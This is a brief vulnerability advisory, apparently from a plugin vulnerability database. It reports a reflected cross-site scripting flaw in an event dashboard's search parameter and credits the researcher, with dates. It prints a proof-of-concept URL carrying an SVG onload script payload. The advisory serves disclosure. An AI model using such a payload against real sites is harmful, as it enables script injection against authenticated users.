The plugin does not sanitise and escape its search before outputting it back in an attribute on the event dashboard, leading to a Reflected Cross-Site Scripting
Against any authenticated user: https://example.com/event-dashboard/?search_keywords=aaaa"><svg onload=prompt(/XSS/)>
Utkarsh Agrawal
Utkarsh Agrawal
Yes
2022-06-20 (about 11 months ago)
2022-06-20 (about 11 months ago)
2023-03-23 (about 2 months ago)